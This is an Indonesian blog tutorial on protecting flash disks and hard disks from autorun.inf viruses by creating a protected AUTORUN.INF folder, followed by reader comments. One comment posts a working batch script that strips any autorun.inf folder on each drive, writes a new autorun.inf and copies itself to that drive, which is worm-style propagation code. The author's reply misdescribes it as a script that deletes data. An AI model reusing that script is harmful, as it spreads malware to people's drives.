Tips Mencegah Flash Disk & Hard Disk tertular virus

29 Maret 2009 at 1:07 am 17 komentar

Banyak virus yang menular melalui script yang otomatis di-eksekusi (dijalankan) di Windows via file AUTORUN.INF. Mungkin sebagian dari anda masih belum memahami bagaimana file AUTORUN.INF bisa tertular virus.

File AUTORUN.INF, adalah file peng-eksekusi secara otomatis dalam suatu media penyimpanan, seperti hardisk, flashdisk, disket. Misal di dalam harddisk ada beberapa partisi, misal :

Partisi C:\ (system windows xp)
partisi D:\ (penyimpanan data-data kita)
dan partisi lainnya

Secara default, file AUTORUN.INF di directory C:\ telah tersedia, tetapi tidak ada isi (script/kode program) yang terkandung dalam file AUTORUN.INF.

“Nah sudah otomatis file AUTORUN.INF yg terdapat di partisi C:\ akan mudah tertular virus”

“Sekarang bagaimana dengan flashdisk???”

Secara default (setelah flashdisk tersebut di format), tidak ada file ataupun folder-folder di dalam flashdisk, tetapi jika flashdisk tersebut di hubungkan ke komputer yang telah terjangkit virus, tidak menutup kemungkinan flashdisk tersebut akan tertular virus.

*Catatan:

“Virus yang menular ke flashdisk ataupun ke hardisk melalui komputer/laptop, biasanya melalui setting AUTORUN/AUTOPLAY yang jalan secara otomatis di dalam Windows XP. Setting-an tersebut bisa kita non-aktifkan menggunakan TweakUI ataupun melalui gpedit.msc (bisa dilihat disini untuk tutorialnya)

*Kesimpulan:

“File AUTORUN.INF, merupakan file yang di-eksekusi secara otomatis jika fungsi AUTOPLAY/AUTORUN berjalan. Didalam file AUTORUN.INF yang sudah tertular, terdapat beberapa skrip kode jahat untuk menularkan/menyebarkan virus-virus. Jenis penularan/penyebarannya tergantung dari virus-virus tersebut.”

***

Nah, dari penjelasan diatas,anda pasti sudah memahami sedikit tentang file AUTORUN.INF.

Sebagian besar virus/trojan yang menggunakan AUTORUN.INF sebagai vektor penyebaran akan mati kutu jika kita telah memodifikasi flashdisk kita, jika kita menggunakan komputer-komputer/laptop-laptop lain yang fungsi AUTOPLAY/AUTORUN-nya masih berjalan.

Caranya sederhana:

Di root directory dari semua partisi dan flash disk mu, buat sebuah folder bernama AUTORUN.INF.
Ubah atribut folder ini menjadi “Read Only” dan “Hidden”. Kalau perlu, “System” sekalian.
Mengapa trik ini bisa jalan? Karena Windows tidak membolehkan pembuatan file yang bernama sama dengan nama folder. Selain itu, cara mendelete folder sangat berbeda dengan cara mendelete file. Sebagian besar virus/trojan yang menular menggunakan AUTORUN.INF tidak bisa menangani hal ini.

Jadi mustinya, metode ini menolong mencegah penularan.

Langkah OPTIONAL (OPTIONAL) Biar lebih manjur lagi, ikutin tambahan langkah2 berikut:

Dalam folder AUTORUN.INF tersebut, buat 1 (satu) atau 2 (dua) file .txt
Rename file .txt tersebut, ganti filenamenya jadi mengandung 2-3 huruf CJK (Chinese-Japanese-Korea) Gunakan saja Character Map dengan font Arial Unicode atau MingLiU atau Batang atau Gulim atau Gungsuh atau… pokoknya font yang mengandung huruf CJK

Keberadaan file dalam folder tersebut menjamin folder tersebut tidak bisa dihapus. Huruf CJK akan mempersulit pembuat virus yang mengandalkan VBScript karena VBScript tidak support Unicode.

Tahap 0:

Download dulu file SETFATR.ZIP dari situs ini:
http://www.programmersheaven.com
Buka SETFATR.ZIP, copy file SETFATR.EXE ke c:

Tahap I (menggunakan command prompt):

Start > Run > cmd
x:
(x: adalah drive letter buat flash disk kamu)
md autorun.inf
(membuat folder autorun.inf)
cd autorun.inf
(masuk ke folder autorun.inf)
echo Jangan dihapus! > 1.txt
(membuat file 1.txt)
echo Jangan dihapus! > 2.txt
JANGAN ditutup Command Prompt nya, lanjut ke Tahap II

Tahap II:

Buka Character Map (ada di Accessories > System)
Pilih salah satu font CJK, seperti Arial Unicode, Batang, Gulim, Gungsuh, MingLiU, atau yang lainnya
Cari huruf CJK, double click
Cari huruf CJK lainnya, double click
Klik copy
Buka Windows Explorer (bukan Internet Explorer yah!)
Masuk ke flash disk kamu
Masuk ke folder autorun.inf
Klik pada 1.txt, tekan F2
Tekan Home
Tekan Ctrl-V
Tekan Enter
Kembali ke Character Map
Hapus kedua huruf CJK di kotak “Characters to Copy”
Pilih huruf CJK lain, double click
Pilih huruf CJK lain lagi, double click
Kembali ke Windows Explorer
Klik pada 2.txt, tekan F2
Tekan Home
Tekan Ctrl-V
Tekan Enter
TUTUP Windows Explorer nya

Tahap III:

Kembali ke Command Prompt
cd\
c:setfatr autorun.inf RSH
(Hati-hati! RSH harus pakai huruf besar!)

Nah, sekarang kalau dilihat dari Windows Explorer, kalau opsi “Hide protected system files” tidak dinyalakan, folder AUTORUN.INF juga tidak terlihat. Tapi bisa dicek keberadaannya:

Tahap Pengecekan:

Copy file AUTORUN.INF ke root dari flash disk (CD-CD installer biasanya punya) — atau –
Copy file apa saja ke root dari flash disk, lalu coba rename jadi autorun.inf Semestinya, proses pencopyan atau rename ini akan gagal, dengan pesan error.

m048
[Hehehe mudah-mudahan gak ribet, pelan2 aja ya mencobanya... , sukses... ]

Sumber : portal.telkomspeedy.com

» Kembali Ke Halaman Depan

Rate this:

Like this:

Be the first to like this post.

Entry filed under: Ilmu Komputer, Keamanan Komputer, Windows XP. Tags: flashdisk, harddisk, Ilmu Komputer, kemanan komputer, mencegah flash disk tertular virus, penyebaran virus, tips, tips-trik, trojan, Tutorial Komputer, virus, virus flashdisk, windows xp.

Islamic Widget – Alhabib Islam Widget Kata Orang, D’Masiv adalah Plagiat, Benarkah?

17 Komentar Add your own

1. Herman S.Y | 7 April 2009 pada 6:00 pm

PERTAMAX….
Balas
2. riadyawan | 15 April 2009 pada 7:09 am

tips yang keren… boleh dicoba lah…

BeDeWe kq blog punya mas herman ada icon unik di bagian kanan bawah… gimana caranya mas???

itu bukan javascript kan??? kan di blog wordpress g’ ngijinin pemakaian javascript…

duh jadi pingin nie… ^^
Balas
- 3. Herman S.Y | 17 April 2009 pada 11:16 pm
  
  @riadyawan
  Thanx…
  Itu cuma script HTML aja kok…
  ini kode HTML-nya:
```
<div style="position:fixed;bottom:0;right:0;color:#9933CC;">#1<img title="#2" src="#3" /></div>
```
  Yg ini diganti ya:
  #1 = kalimat text
  #2 = nama gambar
  #3 = sumber file gambar
  
  [Widget : text]
  SuKsEs Yaw…
  Balas
4. MANOHARA | 25 Juni 2009 pada 9:03 pm

Udah pernah liat script batch seperti ini :
@echo off
set auto=%random%
for %%a in (C D E F G H I J K L M) do if exist %%a:\ (
cacls %%a:\autorun.inf /p everyone:f /e
rd /s /q %%a:\autorun.inf
del /f /a /q %%a:\autorun.inf
echo [autorun]>%%a:\autorun.inf
echo open=%auto%.bat>>%%a:\autorun.inf
echo shellexecute=%auto%.bat>>%%a:\autorun.inf
copy “%0″ “%%a:\%auto%.bat”
attrib +s +h +r %%a:\autorun.inf
attrib +s +h +r “%%a:\%auto%.bat”)
Balas
- 5. Herman S.Y | 26 Juni 2009 pada 12:49 am
  
  @MANOHARA
  
  Ehm… saya baru liat coz situ yg nunjukin scriptnya..
  Kalau diliat2 sih, kayaknya tuh script berfungsi untuk ngilangin semua data di drive (C D E F G H I J K L M), coz ada script:
  - rd /s /q %%a:\autorun.inf
  rd = remove directory/folder, dibantu fungsi autorun.inf
  - del /f /a /q %%a:\autorun.inf
  del = menghapus file, dibantu fungsi autorun.inf
  
  Kesemua script tsb akan tersimpan di file auto%.bat = “autoexec.bat”.
  Nah filenya tersimpan di root c:\
  Setiap login, sudah pasti sistem operasi windows akan mendeteksi file autorunnya yg berada di root c:\
  
  bagaimana file autoexec.bat bisa tertular karena script tsb, itu karena proses copy dari (biasanya):
  - flashdisk
  - disket
  - cdrom
  
  scriptnya yaitu : “copy “%0″ “%%a:\%auto%.bat””
  
  Nah, cara pencegahannya, gunakanlah cara “Tips Mencegah Flashdisk & Harddisk Tertular Virus”… Simple kok…
  Balas
6. MANOHARA | 26 Juni 2009 pada 8:55 am

Emang flashdisk kamu pake trik folder autorun ya? kalo iya, coba kamu jalankan script diatas, dan proteksi folder autorun anda tak lagi berguna
Balas
- 7. Herman S.Y | 26 Juni 2009 pada 11:40 pm
  
  @MANOHARA
  
  Flashdisk saya sih ga pake trik proteksi apapun. Yg saya pake cuma proteksi dari sitem operasi windows, salah satunya ya men-disable autorun. ada lagi cara yg lumayan intermediate yaitu make deepfreeze, dan ada lagi yg cara advance..
  
  So, daripada make antivirus yg berat2 bikin OS lemot, ya lebih efisien memakai trik tersebut…
  Balas
8. MANOHARA | 26 Juni 2009 pada 9:03 am

Sebenarnya fungsi script diatas adl mencari ke semua drive, menghapus “paksa” file dan folder autorun.inf. kemudian membuat autorun.inf baru serta mengaktifkannya pada shell double click pd drive
Balas
- 9. Herman S.Y | 26 Juni 2009 pada 11:38 pm
  
  @MANOHARA
  
  Ehm.. menghapus paksa ya… Insya Allah nanti saya jalankan script tsb, dan melihat hasilnya. Thanx for u’r Info…
  Balas
10. dins | 28 Juni 2009 pada 10:20 am

Tipsnya bisa berhasil mas…

Salam kenal mas, blog sudah saya add mas, mohon di linkback. Terimakasih.
Balas
- 11. Herman S.Y | 28 Juni 2009 pada 10:36 pm
  
  @dins
  
  Salam kenal juga… Ok. Insya Allah saya add.. Terima kasih juga dah mampir… :lol.. Salam kenal juga…
  Balas
12. ari | 21 September 2009 pada 12:53 am

eh virus autorun.inf dah nyebar ni dkomp gw..ampe gw mau buka regedit mlah shut down, buka taks manager gak bsa, komp gw adminnya kekunci tp udah bisa lg c cz ada admin lg gw..pke AVG mlah heal doank tp msh ada..emm jd gmana ni?trus kan kalo virus bukan autorun.inf doank.itu jg setup nya..yg system.exe nya gmana?apa buat folder namanya system.exe jg?malah gw pke folder autorun.inf mlah tetep jdnya kyk gni G:\autorun.inf\autorun.inf
jd gmana?
Balas
- 13. Herman S.Y | 21 September 2009 pada 11:54 am
  
  @ari
  
  sebenernya, file autorun.inf itu bukan virus, melainkan file trigger (pengeksekusi) dari virusnya. Jika komputer sebelumnya telah di install, kemudian fungsi autoplay dari windows tidak di set “Turn off” untuk All drive, maka fungsi autoplay akan berjalan, misal memasukkan flashdisk yg sudah terinfeksi virus. Maka pc/laptop pun akan tertular virus.
  
  Maka dari itu, metode penjelasan diatas akan lebih baik dilakukan jika pc/laptop telah diinstall ulang. Kemudian di setting semua fungsi, misalkan:
  - gpedit.msc –> mematikan fungsi autoplay
  - Membuat folder “autorun.inf” dan membuat file apa saja di dalam folder “autorun.inf” tsb dan menset semuanya menjadi read only.
  
  Saya pribadi telah mencobanya di laptop saya, dan sampai sekarang laptop saya tidak pernah terjangkit virus yg berasal dari trigger file “autorun.inf”.
  
  Jika pc/laptop telah tertular, mau ga mau di scan menggunakan antivirus yg bagus, tetapi jika malas men-scan, ya pake cara paling wahid aja, yaitu format dan install ulang.. :-p
  
  nb: oiya, sebaiknya di upgrade ke SP3, bisa dilakukan melalui windows update. ^_^
  Balas
14. syifa | 21 Januari 2010 pada 9:41 pm

mas salam kenal …..saya minta tolong ada skrip pembobol blok data yg di kunci ama paswod gak kalo ada minta tolong mas apa skrip ya
Balas
- 15. Herman S.Y | 25 Januari 2010 pada 6:05 pm
  
  @syifa:
  Salam kenal juga.
  skrip pembobol sih banyak, pertanyaannya, skrip pembobol blok data untuk apa?
  Hehehhe pengertian data itu luas uy…
  Kalo gua sih, misal FD terkena virus or di blok password or apa lah, hehheheh cara paling mutakhir & ajib yaitu Re-Format…. :-p
  Balas
16. baca manga | 17 Juli 2010 pada 10:05 pm

tukar link/ banner, pasang link ku dulu kalo sudah konfirmasi ke blog ku
Balas
17. ahmadriyadhmz | 9 Desember 2010 pada 4:13 pm

good info, keep posting bro..!!
visit my blog : http://www.ahmadriyadhmz.wordpress.com
Balas